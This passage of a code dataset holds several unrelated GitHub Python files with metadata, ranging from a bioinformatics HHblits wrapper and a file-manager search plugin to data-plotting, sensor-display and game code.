FileExistsError:\n pass\n\n molid = molid.upper()\n cachebase = os.path.join(cachedir, molid)\n cachefile = cachebase + '.hhm'\n\n import gzip\n import tempfile\n import subprocess\n\n if os.path.isfile(cachefile):\n if not use_msa:\n with open(cachefile) as hhmfp:\n return parse_hhm(hhmfp)\n else:\n raise NotImplementedError\n \n # with gzip.open(cachefile, 'rt') as f:\n # if not use_msa:\n # hhmfilename = cachebase + '.hhm'\n # with open(hhmfilename) as hhmfp:\n # parsed_hhm = \n # return json.load(f)\n # else:\n # outa3m = cachebase + '.a3m'\n # proc = subprocess.run(['hhmake', '-i', outa3m, '-v', '0',\n # '-o', 'stdout'],\n # universal_newlines=True,\n # stdout=subprocess.PIPE,\n # stderr=subprocess.PIPE)\n # with open(cachebase + '.a3m.hhm', 'w') as f:\n # f.write(proc.stdout)\n\n # return parse_hhm(iter(proc.stdout.splitlines()))\n\n\n with tempfile.NamedTemporaryFile(mode='w', suffix='.fasta') as tmpf, \\\n tempfile.NamedTemporaryFile(suffix='.hhm', mode='rt') as outf, \\\n tempfile.NamedTemporaryFile(suffix='.a3m', mode='rt') as outa3m:\n print('>' + molid, file=tmpf)\n print(seq, file=tmpf)\n tmpf.flush()\n\n cmd = [\n 'hhblits', '-i', tmpf.name, '-o', '/dev/null', '-ohhm', outf.name,\n '-n', str(hh_iters), '-d', db, '-cpu', '2', '-oa3m', outa3m.name,\n '-mact', mact,\n ] # yapf: disable\n\n try:\n # os.environ['HHLIB'] = '/opt/hhsuite'\n o = subprocess.check_output(\n cmd, stderr=subprocess.STDOUT, universal_newlines=True)\n except subprocess.CalledProcessError as exc:\n print(exc.returncode, exc.output)\n raise\n\n outfname = outf.name\n outf = iter(outf)\n dat = parse_hhm(outf)\n\n # with gzip.open(cachefile, 'wt') as f:\n # json.dump(dat, f)\n \n shutil.copyfile(outfname, cachebase + '.hhm')\n shutil.copyfile(outa3m.name, cachebase + '.a3m')\n\n return dat","repo_name":"Eryk96/NetSurfP-3.0","sub_path":"nsp2/netsurfp2_dev/preprocessing/hhsuite.py","file_name":"hhsuite.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"63"} +{"seq_id":"12399494704","text":"#!/usr/bin/python3\n\n\n# Python imports\nimport os\nimport traceback\nimport argparse\nimport subprocess\nimport json\nimport base64\nimport time\nfrom datetime import datetime\nfrom setproctitle import setproctitle\nfrom multiprocessing.connection import Client\n\n# Lib imports\n\n# Application imports\n\n\n\n\n_ipc_address = f'/tmp/solarfm-search_grep-ipc.sock'\n_ipc_authkey = b'' + bytes(f'solarfm-search_grep-ipc', 'utf-8')\n\nfilter = (\".cpp\", \".css\", \".c\", \".go\", \".html\", \".htm\", \".java\", \".js\", \".json\", \".lua\", \".md\", \".py\", \".rs\", \".toml\", \".xml\", \".pom\") + \\\n (\".txt\", \".text\", \".sh\", \".cfg\", \".conf\", \".log\")\n\n# NOTE: Create timestamp of when this launched. Is used in IPC to see if\n# we are stale and that new call didn't fully kill this or older processes.\ndt = datetime.now()\nts = datetime.timestamp(dt)\n\n\ndef send_ipc_message(message) -> None:\n conn = Client(address=_ipc_address, family=\"AF_UNIX\", authkey=_ipc_authkey)\n conn.send(message)\n conn.close()\n\n # NOTE: Kinda important as this prevents overloading the UI thread\n time.sleep(0.05)\n\n\ndef file_search(path, query):\n try:\n for _path, _dir, _files in os.walk(path, topdown = True):\n for file in _files:\n if query in file.lower():\n target = os.path.join(_path, file)\n data = f\"SEARCH|{ts}|{json.dumps([target, file])}\"\n send_ipc_message(data)\n except Exception as e:\n print(\"Couldn't traverse to path. 
Might be permissions related...\")\n traceback.print_exc()\n\n\ndef grep_search(target=None, query=None):\n if not query or not target:\n return\n\n # NOTE: -n = provide line numbers, -R = Search recursive in given target\n # -i = insensitive, -F = don't do regex parsing. (Treat as raw string)\n command = [\"grep\", \"-n\", \"-R\", \"-i\", \"-F\", query, target]\n proc = subprocess.Popen(command, stdout=subprocess.PIPE, encoding=\"utf-8\")\n raw_data = proc.communicate()[0].strip()\n proc_data = raw_data.split(\"\\n\") # NOTE: Will return data AFTER completion (if any)\n collection = {}\n\n for line in proc_data:\n file, line_no, data = line.split(\":\", 2)\n b64_file = base64.urlsafe_b64encode(file.encode('utf-8')).decode('utf-8')\n b64_data = base64.urlsafe_b64encode(data.encode('utf-8')).decode('utf-8')\n\n if b64_file in collection.keys():\n collection[f\"{b64_file}\"][f\"{line_no}\"] = b64_data\n else:\n collection[f\"{b64_file}\"] = {}\n collection[f\"{b64_file}\"] = { f\"{line_no}\": b64_data}\n\n try:\n data = f\"GREP|{ts}|{json.dumps(collection, separators=(',', ':'), indent=4)}\"\n send_ipc_message(data)\n except Exception as e:\n ...\n\n collection = {}\n\n\ndef search(args):\n if args.type == \"file_search\":\n file_search(args.dir, args.query.lower())\n\n if args.type == \"grep_search\":\n grep_search(args.dir, args.query.encode(\"utf-8\"))\n\n\nif __name__ == \"__main__\":\n try:\n setproctitle('SolarFM: File Search - Grepy')\n\n parser = argparse.ArgumentParser()\n # Add long and short arguments\n parser.add_argument(\"--type\", \"-t\", default=None, help=\"Type of search to do.\")\n parser.add_argument(\"--dir\", \"-d\", default=None, help=\"Directory root for search type.\")\n parser.add_argument(\"--query\", \"-q\", default=None, help=\"Query search is working against.\")\n\n # Read arguments (If any...)\n args = parser.parse_args()\n search(args)\n except Exception as e:\n traceback.print_exc()\n","repo_name":"maximstewart/SolarFM","sub_path":"plugins/searcher/utils/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"63"} +{"seq_id":"6787412262","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nRun tests for the Dalite XBlock.\n\nThis script is required to run our selenium tests inside the xblock-sdk workbench\nbecause the workbench SDK's settings file is not inside any python module.\n\"\"\"\n\nimport os\nimport sys\n\nimport logging\n\n\ndef main():\n \"\"\"Main entry point.\"\"\"\n noisy_logger_overrides = {\n 'workbench.views': logging.ERROR,\n 'django.request': logging.ERROR,\n 'workbench.runtime': logging.ERROR,\n }\n\n # Use the workbench settings file:\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"workbench.settings\")\n # Configure a range of ports in case the default port of 8081 is in use\n os.environ.setdefault(\"DJANGO_LIVE_TEST_SERVER_ADDRESS\", \"localhost:8081-8099\")\n\n for noisy_logger, log_level in noisy_logger_overrides.iteritems():\n logging.getLogger(noisy_logger).setLevel(log_level)\n\n from django.core.management import execute_from_command_line\n args = sys.argv[1:]\n paths = [arg for arg in args if arg[0] != '-']\n if not paths:\n paths = [\"tests/\"]\n options = [arg for arg in args if arg not in paths]\n execute_from_command_line([sys.argv[0], \"test\"] + paths + options)\n\nif __name__ == \"__main__\":\n 
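# entry point: run the Django test command via main() when this script is executed directly\n    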
main()\n","repo_name":"open-craft/xblock-dalite","sub_path":"run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"33216780693","text":"import csv\nimport urllib.request\nimport urllib.parse \nimport os.path\nfrom os import walk\nimport json\n\ndef yasbtoxws( url ):\n if len(url) > 0:\n newurl = url.replace( 'raithos.github.io', 'squad2xws.herokuapp.com/yasb/xws')\n\n with urllib.request.urlopen( newurl ) as response:\n return json.loads( response.read(), encoding='UTF-8' ) \n\nttt = {}\n\ndef savetoxws( path, row ):\n \n name = row[0]\n if len(name) == 0:\n name = row[1]\n cleanname = \"\".join([c for c in name if c.isalpha() or c.isdigit() or c==' ' or c=='_' or c=='(' or c ==')']).rstrip()\n filename = path + cleanname + '.json' \n\n if not os.path.isfile( filename ):\n print('Saving ' + filename)\n j = {}\n j['VassalForm1'] = row[0]\n j['VassalForm2'] = row[1]\n j['Name'] = row[2]\n j['Discord'] = row[3]\n j['TTT'] = row[4]\n\n j['Option1'] = yasbtoxws(row[5])\n j['Option2'] = yasbtoxws(row[6])\n j['Drop'] = row[7]\n j['Add'] = row[8]\n\n if row[4] in ttt:\n if 'list' in ttt[row[4]]:\n j['Final'] = ttt[row[4]]['list']\n with open(filename, 'w', encoding='UTF-8') as xws:\n xws.write( json.dumps(j, sort_keys=True, indent=4, separators=(',', ': ')) )\n else:\n print('No list for ' + row[4])\n else:\n print('Who is ' + row[4])\n\n if row[4] in ttt:\n del ttt[ row[4] ]\n\ndef saverowtoxws( row ):\n savetoxws( './xws-final/', row )\n\nwith open( 'jto.json', 'r', encoding='UTF-8') as tttf:\n tttj = json.load( tttf )\n for player in tttj['tournament']['players']:\n ttt[ player['name'] ] = player\n\n# get all the XWS if we don't have them\nwith open('JTO Fully Correlated - Correlated.csv', 'r', encoding='UTF-8') as csvfile:\n reader = csv.reader(csvfile, delimiter=',' )\n next(reader)\n for row in reader:\n try:\n saverowtoxws(row)\n except urllib.error.HTTPError as err:\n print(err.url)\n except json.decoder.JSONDecodeError as err:\n print('JSONDecodeError for ' + row[0] + ' ' + row[1] )\n \n\n# combine them all now\nxwsfiles = []\nfor (dirpath, dirnames, filenames) in walk('./xws-final/'):\n for filename in filenames:\n xwsfiles.append ( os.path.join( dirpath, filename ) )\n\ncombined = []\n\nfor xwsfile in xwsfiles:\n with open(xwsfile,'r', encoding='UTF-8') as xws:\n combined.append(json.load(xws))\n\nwith open('combined-final.json', 'w', encoding='UTF-8') as output:\n output.write( json.dumps(combined, sort_keys=True, indent=4, separators=(',', ': '))) \n","repo_name":"XPav/jtoanalysis","sub_path":"getxws-final.py","file_name":"getxws-final.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"43521062346","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 9 14:40:01 2023\n\n@author: kthat\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport stats as stats\n\n\ndef read_data(datafile):\n \"\"\"\n Read data from excel file and return dataframe\n \"\"\"\n data = pd.read_excel(datafile)\n return data\n\n\ndef print_to_file(df_m):\n \"\"\"\n This method is common print used to print given data to text file\n \"\"\"\n x = np.random.randint(1, 100)\n filename = \"dataframe\" + str(x) + \".txt\"\n textfile = open(filename, \"w\")\n df_m.to_string(textfile)\n textfile.close()\n\n\ndef 
manipulate_data(df, ind_header, ind_value, years, countries):\n \"\"\"\n Filter data, manipulate, and transpose dataframe to draw plot from it\n \"\"\"\n # Groupby indicator and values\n df_m = df.groupby(ind_header, group_keys=True)\n df_m = df_m.get_group(ind_value)\n # Set index and filter data\n df_m = df_m.reset_index()\n df_m = df_m.set_index('Country Name')\n df_m = df_m.loc[:, years]\n df_m = df_m.loc[countries, :]\n # Remove null values\n df_m = df_m.dropna()\n # Round to 2 decimal float\n df_m = round(df_m, 3)\n # Transpose dataframe\n df_transpose = df_m.transpose()\n\n return df_transpose, df_m\n\n\ndef draw_barplot(df, title):\n \"\"\" \n This method is used to create a bar plot.\n Arguments: x and y will be selectively assigned by method attributes. \n \"\"\"\n # Plot bar\n fig, ax = plt.subplots()\n ax = df.plot.bar()\n # Add label and title\n ax.set_title(title, color=\"red\", fontsize=10)\n ax.legend(loc=\"upper right\", fontsize='x-small')\n plt.show()\n\n return\n\n\ndef draw_heatmap(corr, country, cmap):\n \"\"\" \n This method is used to create a heatmap.\n Arguments: x and y will be selectively assigned by method attributes. \n \"\"\"\n # Plot heatmap\n plt.figure(figsize=(25, 12))\n sns.heatmap(corr, annot=True, fmt=\".2f\", cmap=cmap, annot_kws={'size': 28})\n plt.title('Correlation Heatmap for ' + country, fontsize=30)\n plt.show()\n\n return\n\n\ndef prepare_stats(df, years, coun_header, coun_value):\n \"\"\" \n This method is used to prepare dataset to retrieve statistics data and find correlation matrix.\n \"\"\"\n # Groupby indicator values\n df_m = df.groupby(coun_header, group_keys=True)\n df_m = df_m.get_group(coun_value)\n df_m = df_m.reset_index()\n df_m = df_m.set_index('Series Name')\n df_m = df_m.loc[:, years]\n # Remove null values\n df_m = df_m.dropna()\n # Transpose dataframe\n df_transpose = df_m.transpose()\n # Find correlation matrix\n correlation = df_transpose.corr()\n\n return df_m, df_transpose, correlation\n\n\ndef stats_summary(df_m):\n # Find describe stats variables\n describe_stats = df_m.describe()\n print_to_file(describe_stats)\n # Find skewness of distribution and print\n skewness = stats.skew(df_manipulate)\n print(skewness)\n # Find kurtosis of distribution print\n kurtosis = stats.kurtosis(df_manipulate)\n print(kurtosis)\n\n\ndef draw_lineplot(df_m, title):\n \"\"\" \n This method is used to create a line plot.\n Arguments: x and y will be selectively assigned by method attributes. 
\n \"\"\"\n plt.figure()\n df_m.plot.line(linestyle='dashdot')\n plt.title(title, fontsize=12, color='blue')\n plt.legend(bbox_to_anchor=(1, 1))\n plt.show()\n\n return\n\n\ndef draw_table(df_m, title):\n \"\"\" \n This method is used to create a fine table.\n \"\"\"\n # Create a table using matplotlib\n plt.figure()\n # Turn off axis labels and ticks for good appearance\n plt.axis('off')\n plt.title(title, color='blue', fontsize=15, loc='left')\n # Display the table\n table = plt.table(cellText=df_m.values, colLabels=df_m.columns,\n rowLabels=df_m.index, loc='center', cellLoc='center')\n table.auto_set_column_width(col=list(range(len(df_m.columns))))\n\n return\n\n\n\"\"\"\nStep1: Read world bank data from file\n\"\"\"\nfilename = 'C:\\\\Users\\\\kthat\\\\OneDrive\\\\ADS1\\\\assignment2\\\\World_Development_Indicators_new3.xlsx'\ndataframe = read_data(filename)\n\n\"\"\"\nStep2 : Prepare data with manipulating dataframe and ploting bar charts for two dataframes.\nindicator 1 (EN.CO2.OTHX.ZS) selected - CO2 emissions from other sectors, excluding residential buildings \nand commercial and public services\n# indicator 2 (NV.IND.TOTL.KD.ZG) selected - Industry (including construction), annual % growth\n\"\"\"\nindicator_header = 'Series Code'\nindicator_value_1 = 'EN.CO2.OTHX.ZS'\nindicator_value_2 = 'NV.IND.TOTL.KD.ZG'\nyears = ['1996 [YR1996]', '2000 [YR2000]',\n '2004 [YR2004]', '2008 [YR2008]', '2012 [YR2012]']\ncountries = ['Norway', 'Australia', 'Ireland', 'Netherlands',\n 'Denmark', 'Iceland', 'Canada', 'United States']\n# Call method for manipulate dataframe\ndf_transposed_1, df_climate_1 = manipulate_data(\n dataframe, indicator_header, indicator_value_1, years, countries)\ndf_transposed_2, df_climate_2 = manipulate_data(\n dataframe, indicator_header, indicator_value_2, years, countries)\n# Print transposed data\nprint_to_file(df_transposed_1)\nprint_to_file(df_transposed_2)\n# Call method to plot bar chart\ntitle_bar_1 = \"CO2 emissions from all sectors, excluding residential, commercial and public services\"\ntitle_bar_2 = \"Industry (including construction), value added (annual % growth)\"\ndraw_barplot(df_climate_1, title_bar_1)\ndraw_barplot(df_climate_2, title_bar_2)\n\n\"\"\"\nStep3 : Prepare data for heatmap and ploting heatmap for selected countries.\n\"\"\"\nyears = ['1996 [YR1996]', '2000 [YR2000]',\n '2004 [YR2004]', '2008 [YR2008]', '2012 [YR2012]']\ncountry_header = 'Country Name'\n# Create heatmap for 'Ireland'\ncountry = 'Ireland'\ncmap = 'mako'\ndf_manipulate, df_heatmap, correlation = prepare_stats(\n dataframe, years, country_header, country)\n# print heatmap data\nprint_to_file(df_heatmap)\n# Call method to plot heatmap\ndraw_heatmap(correlation, country, cmap)\n\n\"\"\"\nStep4 : Find summary of Statistcis data\n\"\"\"\nstats_summary(df_manipulate)\n\n\"\"\"\nStep5 : Create another two heatmap for different countries\n\"\"\"\n# Create heatmap for 'United States'\ncountry = 'United States'\ncmap = 'viridis'\ndf_manipulate, df_heatmap, correlation = prepare_stats(\n dataframe, years, country_header, country)\nprint_to_file(df_heatmap)\ndraw_heatmap(correlation, country, cmap)\n# Create heatmap for 'Iceland'\ncountry = 'Iceland'\ncmap = 'magma'\ndf_manipulate, df_heatmap, correlation = prepare_stats(\n dataframe, years, country_header, country)\nprint_to_file(df_heatmap)\ndraw_heatmap(correlation, country, cmap)\n\n\"\"\"\nStep6 : Create line plots for two different indicators.\nindicator 1 (EN.CO2.BLDG.ZS) - CO2 emissions from residential buildings and commercial 
and public services\nindicator 2 (NV.AGR.TOTL.KD.ZG) - Agriculture, forestry, and fishing, value added (annual % growth)\n\"\"\"\nindicator_header = 'Series Code'\nindicator_value_1 = 'EN.CO2.BLDG.ZS'\nindicator_value_2 = 'NV.AGR.TOTL.KD.ZG'\nyears = ['1996 [YR1996]', '2000 [YR2000]',\n '2004 [YR2004]', '2008 [YR2008]', '2012 [YR2012]']\ncountries = ['Norway', 'Australia', 'Ireland',\n 'Netherlands', 'Iceland', 'Canada', 'United States']\ntitle1 = 'CO2 emissions from residential, commercial and public'\ntitle2 = 'Agriculture, forestry and fishing annual growth)'\n# Call method for manipulate dataframe\ndf_transposed_1, df_m1 = manipulate_data(\n dataframe, indicator_header, indicator_value_1, years, countries)\ndf_transposed_2, df_m2 = manipulate_data(\n dataframe, indicator_header, indicator_value_2, years, countries)\n# Print data to file\nprint_to_file(df_transposed_1)\nprint_to_file(df_transposed_2)\n# Call method to plot\ndraw_lineplot(df_transposed_1, title1)\ndraw_lineplot(df_transposed_2, title2)\n\n\"\"\"\nStep7 : Create table for Urban population growth\n\"\"\"\nyears_table = ['1996 [YR1996]', '2004 [YR2004]', '2012 [YR2012]']\ndf_table = df_m1.loc[:, years_table]\ntitle = 'Urban population by country and year'\n# Call method to create table\ndraw_table(df_table, title)\n","repo_name":"kavithasub/uh-study-modules","sub_path":"applied-data-science/assignment/assignment-2/assignment2.py","file_name":"assignment2.py","file_ext":"py","file_size_in_byte":7999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"35442306390","text":"\r\n# Output the length, return and episode number\r\ndef output_return(len, ret, num):\r\n\t\tprint(f\"Episode number: {num}\")\r\n\t\tprint(f\"Episodic length: {len}\")\r\n\t\tprint(f\"Episodic return: {ret}\\n\")\r\n\r\n# Execute one full episode, calculate return and len of the episode\r\ndef proc_episode(args, policy, env):\r\n\tdone = False\r\n\tnext_state = env.reset()\r\n\tlen, ret = 0, 0, # Epis. 
len and return\r\n\r\n\twhile not done:\r\n\t\tlen += 1\r\n\t\tif args.img_rend:\r\n\t\t\tenv.render()\r\n\r\n\t\t# Generate and execute next action\r\n\t\taction = policy(next_state).detach().numpy()\r\n\t\tnext_state, rew, done, _ = env.step(action)\r\n\r\n\t\t# Aggregate reward\r\n\t\tret += rew\r\n\treturn len, ret\r\n\r\n# Execute user-defined number of episodes using a trained model\r\ndef test_model(args, policy, env):\r\n\ti, len, ret = 0, 0, 0\r\n\r\n\tfor i in range(args.img_rend_freq): # Using img_rend_freq as stopping criteria \r\n\t\tlen, ret = proc_episode(args, policy, env)\r\n\t\toutput_return(len=len, ret=ret, num=i)\r\n","repo_name":"bchartier777/PPO_v1","sub_path":"test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} {"seq_id":"759539289","text":"class Sync:\n\t\n\tdef __init__(self, x, y):\n\t\tself.x = x\n\t\tself.y = y\n\n\tdef _isclose(self, a, b, rel_tol=1e-09, abs_tol=0.0):\n\t\treturn abs(a-b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)\n\n\tdef check(self, x):\n\t\n\t\ti, f = 0, 0\n\t\twhile i < (len(x) - 1):\n\t\t\tif i > 1:\n\t\t\t\ta = (float(x[i]) - float(x[i - 1]))\n\t\t\t\tb = (float(x[i + 1]) - float(x[i]))\n\t\t\t\tif not (self._isclose(a, b)):\n\t\t\t\t\tf += 1\n\t\t\t\t\t\n\t\t\ti += 1\n\t\tif f:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef resample(self, x, y):\n\t\tpass\n","repo_name":"zadewg/deside","sub_path":"ASYNC.py","file_name":"ASYNC.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"63"} {"seq_id":"40833225260","text":"from .operating_schedule import OperatingSchedule, WorkTime\nfrom hr_2020_app.hr_2020_domain.basic_entity import BasicEntity\nfrom hr_2020_app.hr_2020_domain.basic_value import BasicValue\nfrom marshmallow import fields, post_load\nfrom typing import List\n\n\nclass Address(BasicValue):\n    def __init__(self,\n                 street: str,\n                 neighborhood: str,\n                 city: str,\n                 state: str,\n                 street_number: str = 'S/N',\n                 postal_code: str = None,\n                 complement: str = None):\n        self.street = street\n        self.street_number = street_number\n        self.complement = complement\n        self.neighborhood = neighborhood\n        self.city = city\n        self.state = state\n        self.postal_code = postal_code\n\n    def to_string(self):\n        return f'{self.street}, {self.street_number}, ' \\\n               f'{self.complement} - {self.neighborhood}, {self.city} - ' \\\n               f'{self.state}, {self.postal_code}'\n\n    class Schema(BasicValue.Schema):\n        street = fields.String(required=True, allow_none=False)\n        street_number = fields.String(required=True, allow_none=False, default='S/N')\n        complement = fields.String(required=False, allow_none=True)\n        neighborhood = fields.String(required=True, allow_none=False)\n        city = fields.String(required=True, allow_none=False)\n        state = fields.String(required=True, allow_none=False)\n        postal_code = fields.String(required=False, allow_none=True)\n\n        @post_load\n        def post_load(self, data, many, partial):\n            return Address(**data)\n\n\nclass TouristSpot(BasicEntity):\n    def __init__(self,\n                 name: str,\n                 telephone: str,\n                 address: Address,\n                 operating_schedules: list = None,\n                 description: str = None,\n                 web_page: str = None,\n                 _id = None):\n        super(TouristSpot, self).__init__(_id=_id)\n        self.name = name\n        self.description = description\n        self.telephone = telephone\n        self.address = address\n        self.operating_schedules: List[OperatingSchedule] = 
\\\n operating_schedules if operating_schedules else []\n self.web_page = web_page\n\n class Schema(BasicEntity.Schema):\n name = fields.String(required=True, allow_none=False)\n description = fields.String(required=False, allow_none=True)\n telephone = fields.String(required=True, allow_none=False)\n address = fields.Nested(Address.Schema, required=True, allow_none=False)\n operating_schedules = fields.Nested(\n OperatingSchedule.Schema,\n required=False,\n allow_none=True,\n many=True)\n web_page = fields.String(required=False, allow_none=True)\n\n @post_load\n def post_load(self, data, many, partial):\n return TouristSpot(**data)\n","repo_name":"aberriel/inkasa_backend","sub_path":"hr_2020_app/hr_2020_domain/tourist_spot/tourist_spot.py","file_name":"tourist_spot.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"43756835466","text":"#! /usr/bin/python3\n\"\"\"\nQuery Open Weather API and AHT20 qwiic sensor.\nDisplay results on eInk bonnet.\nBased off of https://learn.adafruit.com/raspberry-pi-e-ink-weather-station-using-python/weather-station-code\nAKA 2020\n\"\"\"\n\nimport time\nimport urllib.request\nimport urllib.parse\nimport digitalio\nimport busio\nimport smbus\nimport board\nfrom adafruit_epd.ssd1675 import Adafruit_SSD1675\nfrom weather_graphics import Weather_Graphics\nimport adafruit_ahtx0\nimport json\nfrom akakeysreal import ak\n\n\nspi = busio.SPI(board.SCK, MOSI=board.MOSI, MISO=board.MISO)\necs = digitalio.DigitalInOut(board.CE0)\ndc = digitalio.DigitalInOut(board.D22)\nrst = digitalio.DigitalInOut(board.D27)\nbusy = digitalio.DigitalInOut(board.D17)\n\nbus = smbus.SMBus(1)\ni2c = busio.I2C(board.SCL, board.SDA)\naht20 = adafruit_ahtx0.AHTx0(i2c)\n\nteensy_msg_len = 29 # our teensy code always sends fixed-len response\nteensy_address = 0x77\n\nif ak[\"OPEN_WEATHER_TOKEN\"] == \"DUMMY_VALUE\":\n raise RuntimeError(\n \"You need to set your token first. 
If you don't already have one, you can register for a free account at https://home.openweathermap.org/users/sign_up\"\n )\n\n# Set up where we'll be fetching data from\nparams = {\"q\": ak[\"LOCATION\"], \"appid\": ak[\"OPEN_WEATHER_TOKEN\"]}\ndata_source = ak[\"DATA_SOURCE_URL\"] + \"?\" + urllib.parse.urlencode(params)\n\n# Initialize the Display\ndisplay = Adafruit_SSD1675(\n 122, 250, spi, cs_pin=ecs, dc_pin=dc, sramcs_pin=None, rst_pin=rst, busy_pin=busy,\n)\n\ndisplay.rotation = 1\n\ngfx = Weather_Graphics(display, am_pm=True, celsius=ak[\"USE_PROPER_UNITS_NOT_FAHRENHEIT\"])\nweather_refresh = None\nreading = {}\ntomp = {}\nSAMPLE_DEPTH = 250 # number of minutes of data to retain, here we choose 250mins, width of eink display\n\n\ndef init_readings():\n \"\"\"Fill sample buffer with zeroes.\"\"\"\n reading['aqiA'] = [0] * SAMPLE_DEPTH\n reading['aqiB'] = [0] * SAMPLE_DEPTH\n reading['pm25A'] = [0] * SAMPLE_DEPTH\n reading['pm25B'] = [0] * SAMPLE_DEPTH\n reading['pm4A'] = [0] * SAMPLE_DEPTH\n reading['pm4B'] = [0] * SAMPLE_DEPTH\n\n\ndef get_reading():\n \"\"\"Test function.\"\"\"\n # Write out I2C command: address, reg_write_dac, msg[0], msg[1]\n # msg = random.getrandbits(8)\n # bus.write_byte_data(address, reg_write_datareq, msg)\n\n # payload = bus.read_i2c_block_data(address, 0, msg_len)\n payload = bytearray(teensy_msg_len)\n i2c.readfrom_into(teensy_address, payload)\n for i in reading:\n reading[i].pop(0)\n reading['aqiA'].append(collapse(payload[0:4]))\n reading['aqiB'].append(collapse(payload[5:9]))\n reading['pm25A'].append(collapse(payload[10:14]))\n reading['pm25B'].append(collapse(payload[15:19]))\n reading['pm4A'].append(collapse(payload[20:24]))\n reading['pm4B'].append(collapse(payload[25:29]))\n\n\ndef collapse(intlist):\n \"\"\"Collapse a list of int values of chars into the int they represent.\"\"\"\n f = ''\n for i in intlist:\n f += chr(i)\n return int(f)\n\n\ninit_readings()\n\n'''\nBUTTONS AVAILABLE:\nimport digitalio\n\nup_button = digitalio.DigitalInOut(board.D5)\nup_button.switch_to_input()\ndown_button = digitalio.DigitalInOut(board.D6)\ndown_button.switch_to_input()\n\nif not up_button.value:\n print(\"Up Button Pushed\")\n\nif not down_button.value:\n print(\"Down Button Pushed\")\n'''\n\nwhile True:\n get_reading()\n # only query the weather every 10 minutes (and on first run)\n if (not weather_refresh) or (time.monotonic() - weather_refresh) > ak[\"REFRESH_INTERVAL\"]:\n try:\n response = urllib.request.urlopen(data_source)\n except urllib.error.HTTPError as e:\n # do something\n if ak[\"VERBOSE\"]:\n print('urllib.request Error code: ', e.code)\n except urllib.error.URLError as e:\n # do something\n if ak[\"VERBOSE\"]:\n print('Reason: ', e.reason)\n else:\n if response.getcode() == 200:\n value = response.read()\n tomp = json.loads(value)\n tomp['ttmp'] = \"{:.01f}\".format(aht20.temperature)\n tomp['thum'] = \"{:.0f}\".format(aht20.relative_humidity)\n tomp['aqiA'] = reading['aqiA']\n tomp['aqiB'] = reading['aqiB']\n tomp['pm25A'] = reading['pm25A']\n tomp['pm25B'] = reading['pm25B']\n tomp['pm4A'] = reading['pm4A']\n tomp['pm4B'] = reading['pm4B']\n if ak[\"VERBOSE\"]:\n print(\"Web-fetched this time, tomp is: \", tomp)\n # gfx.display_weather(json.dumps(tomp))\n weather_refresh = time.monotonic()\n else:\n if ak[\"VERBOSE\"]:\n print(\"Unable to retrieve data at {}\".format(data_source))\n else:\n tomp['ttmp'] = \"{:.01f}\".format(aht20.temperature)\n tomp['thum'] = \"{:.0f}\".format(aht20.relative_humidity)\n tomp['aqiA'] = reading['aqiA']\n 
tomp['aqiB'] = reading['aqiB']\n tomp['pm25A'] = reading['pm25A']\n tomp['pm25B'] = reading['pm25B']\n tomp['pm4A'] = reading['pm4A']\n tomp['pm4B'] = reading['pm4B']\n if ak[\"VERBOSE\"]:\n print(\"No web fetch this time, tomp is: \", tomp)\n gfx.display_weather(json.dumps(tomp))\n time.sleep(60) # wait 1+ minute before updating anything again, so the minutes-digit is sure to update\n","repo_name":"AKAMEDIASYSTEM/aka-aqm","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"4600732852","text":"from OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLUT import *\n\nscreen_width, screen_height = 600, 600\n\ncols = 6\nrows = 6\n\nclass Wall:\n def __init__(self):\n '''\n special function: \n 1. prolong, 2. shorten, 3. accelerate, 4. two balls \n '''\n self.width = screen_width // cols - 6\n self.height = 30\n \n \n \n # create blocks of the breakout game\n def create_wall(self, level):\n self.matrix = []\n with open(level) as f:\n lines = f.readlines()\n for line in lines:\n line_row = []\n for c in line.split(' '):\n line_row.append(int(c))\n self.matrix.append(line_row)\n\n self.blocks = []\n block_individual = []\n\n for row in range(rows):\n block_row = []\n for col in range(cols):\n block_x = col * self.width\n block_y = row * self.height\n\n strength = self.matrix[row][col] // 10\n special = self.matrix[row][col] % 10\n if strength == 0:\n col += 1\n continue\n\n lower_left = [-screen_width // 2 + (5 * (col + 1)) + block_x, screen_height // 2 - self.height - (5 * (row + 1)) - block_y]\n higer_left = [-screen_width // 2 + (5 * (col + 1)) + block_x, screen_height // 2 - (5 * (row + 1)) - block_y]\n higher_right = [-screen_width // 2 + self.width + (5 * (col + 1)) + block_x, screen_height // 2 - (5 * (row + 1)) - block_y]\n lower_right = [-screen_width // 2 + self.width + (5 * (col + 1)) + block_x, screen_height // 2 - self.height - (5 * (row + 1)) - block_y]\n \n rect = [lower_left, higer_left, higher_right, lower_right]\n \n block_individual = [rect, strength, False, special] # x y position, strength, hit or not, special function\n\n block_row.append(block_individual)\n\n self.blocks.append(block_row)\n\n # draw the blocks\n def draw(self):\n for row in self.blocks:\n for block in row:\n if block[3] != 